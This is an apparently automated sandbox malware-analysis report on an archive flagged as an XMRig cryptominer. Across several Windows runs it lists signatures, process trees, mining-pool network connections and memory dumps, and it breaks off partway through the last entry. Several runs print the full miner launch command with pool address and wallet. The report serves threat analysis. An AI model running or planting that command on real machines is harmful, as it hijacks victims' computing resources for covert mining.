Analysis Overview
SHA256
5b06e18380c2c8261419a482e5d54b189bbe9b0feaccd355c3cb1bc4aaedd017
Threat Level: Known bad
The file PUB.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
Xmrig family
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-25 14:08
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
1189s
Max time network
1186s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5692 wrote to memory of 2828 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 5692 wrote to memory of 2828 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2828-0-0x00000165117A0000-0x00000165117C0000-memory.dmp
memory/2828-1-0x0000016511800000-0x0000016511820000-memory.dmp
memory/2828-2-0x0000016511820000-0x0000016511840000-memory.dmp
memory/2828-3-0x0000016511840000-0x0000016511860000-memory.dmp
memory/2828-5-0x0000016511840000-0x0000016511860000-memory.dmp
memory/2828-4-0x0000016511820000-0x0000016511840000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
1160s
Max time network
1174s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 800 wrote to memory of 2828 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 800 wrote to memory of 2828 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2828-0-0x0000011AFA600000-0x0000011AFA620000-memory.dmp
memory/2828-1-0x0000011B8C780000-0x0000011B8C7A0000-memory.dmp
memory/2828-2-0x0000011B8CBC0000-0x0000011B8CBE0000-memory.dmp
memory/2828-3-0x0000011B8CDF0000-0x0000011B8CE10000-memory.dmp
memory/2828-4-0x0000011B8CBC0000-0x0000011B8CBE0000-memory.dmp
memory/2828-5-0x0000011B8CDF0000-0x0000011B8CE10000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
729s
Max time network
1181s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1076 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 1076 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2792-0-0x0000026285290000-0x00000262852B0000-memory.dmp
memory/2792-1-0x0000026286C80000-0x0000026286CA0000-memory.dmp
memory/2792-2-0x0000026286CA0000-0x0000026286CC0000-memory.dmp
memory/2792-3-0x0000026286CE0000-0x0000026286D00000-memory.dmp
memory/2792-4-0x0000026286CA0000-0x0000026286CC0000-memory.dmp
memory/2792-5-0x0000026286CE0000-0x0000026286D00000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
733s
Max time network
1173s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1016 wrote to memory of 4760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 1016 wrote to memory of 4760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4760-0-0x000001D6C2990000-0x000001D6C29B0000-memory.dmp
memory/4760-1-0x000001D6C2AD0000-0x000001D6C2AF0000-memory.dmp
memory/4760-3-0x000001D6C2B10000-0x000001D6C2B30000-memory.dmp
memory/4760-2-0x000001D6C2AF0000-0x000001D6C2B10000-memory.dmp
memory/4760-5-0x000001D6C2B10000-0x000001D6C2B30000-memory.dmp
memory/4760-4-0x000001D6C2AF0000-0x000001D6C2B10000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241023-en
Max time kernel
732s
Max time network
1184s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3568 wrote to memory of 3168 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3568 wrote to memory of 3168 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/3168-0-0x00000170F6390000-0x00000170F63B0000-memory.dmp
memory/3168-1-0x0000017188510000-0x0000017188530000-memory.dmp
memory/3168-2-0x0000017188960000-0x0000017188980000-memory.dmp
memory/3168-3-0x0000017188B90000-0x0000017188BB0000-memory.dmp
memory/3168-4-0x0000017188960000-0x0000017188980000-memory.dmp
memory/3168-5-0x0000017188B90000-0x0000017188BB0000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
733s
Max time network
1183s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4244 wrote to memory of 5052 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 4244 wrote to memory of 5052 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/5052-0-0x00000211348F0000-0x0000021134910000-memory.dmp
memory/5052-1-0x0000021136240000-0x0000021136260000-memory.dmp
memory/5052-2-0x0000021136260000-0x0000021136280000-memory.dmp
memory/5052-3-0x0000021136280000-0x00000211362A0000-memory.dmp
memory/5052-4-0x0000021136260000-0x0000021136280000-memory.dmp
memory/5052-5-0x0000021136280000-0x00000211362A0000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
753s
Max time network
1192s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3444 wrote to memory of 1220 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3444 wrote to memory of 1220 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/1220-0-0x000001E278780000-0x000001E2787A0000-memory.dmp
memory/1220-1-0x000001E2787D0000-0x000001E2787F0000-memory.dmp
memory/1220-2-0x000001E278800000-0x000001E278820000-memory.dmp
memory/1220-3-0x000001E278820000-0x000001E278840000-memory.dmp
memory/1220-4-0x000001E278800000-0x000001E278820000-memory.dmp
memory/1220-5-0x000001E278820000-0x000001E278840000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
1170s
Max time network
1190s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2696 wrote to memory of 2528 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 2696 wrote to memory of 2528 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2528-0-0x000002154A490000-0x000002154A4B0000-memory.dmp
memory/2528-1-0x000002154A4D0000-0x000002154A4F0000-memory.dmp
memory/2528-2-0x000002154A4F0000-0x000002154A510000-memory.dmp
memory/2528-3-0x000002154A510000-0x000002154A530000-memory.dmp
memory/2528-4-0x000002154A4F0000-0x000002154A510000-memory.dmp
memory/2528-5-0x000002154A510000-0x000002154A530000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
1158s
Max time network
1174s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 416 wrote to memory of 1216 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 416 wrote to memory of 1216 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
Files
memory/1216-0-0x000001C4FFB80000-0x000001C4FFBA0000-memory.dmp
memory/1216-1-0x000001C4FFBD0000-0x000001C4FFBF0000-memory.dmp
memory/1216-3-0x000001C4FFC10000-0x000001C4FFC30000-memory.dmp
memory/1216-2-0x000001C4FFBF0000-0x000001C4FFC10000-memory.dmp
memory/1216-5-0x000001C4FFC10000-0x000001C4FFC30000-memory.dmp
memory/1216-4-0x000001C4FFBF0000-0x000001C4FFC10000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
1157s
Max time network
1174s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 712 wrote to memory of 2564 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 712 wrote to memory of 2564 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2564-0-0x0000025DBD310000-0x0000025DBD330000-memory.dmp
memory/2564-1-0x0000025DBD450000-0x0000025DBD470000-memory.dmp
memory/2564-2-0x0000025DBD470000-0x0000025DBD490000-memory.dmp
memory/2564-3-0x0000025DBD490000-0x0000025DBD4B0000-memory.dmp
memory/2564-4-0x0000025DBD470000-0x0000025DBD490000-memory.dmp
memory/2564-5-0x0000025DBD490000-0x0000025DBD4B0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:13
Platform
win10ltsc2021-20241023-en
Max time kernel
155s
Max time network
282s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.36.55:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/1080-0-0x000001FF85F80000-0x000001FF85FA0000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
740s
Max time network
1184s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4936 wrote to memory of 4916 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 4936 wrote to memory of 4916 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
Files
memory/4916-0-0x000001E48A300000-0x000001E48A320000-memory.dmp
memory/4916-1-0x000001E48A340000-0x000001E48A360000-memory.dmp
memory/4916-2-0x000001E48A360000-0x000001E48A380000-memory.dmp
memory/4916-3-0x000001E48A380000-0x000001E48A3A0000-memory.dmp
memory/4916-4-0x000001E48A360000-0x000001E48A380000-memory.dmp
memory/4916-5-0x000001E48A380000-0x000001E48A3A0000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
731s
Max time network
1183s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
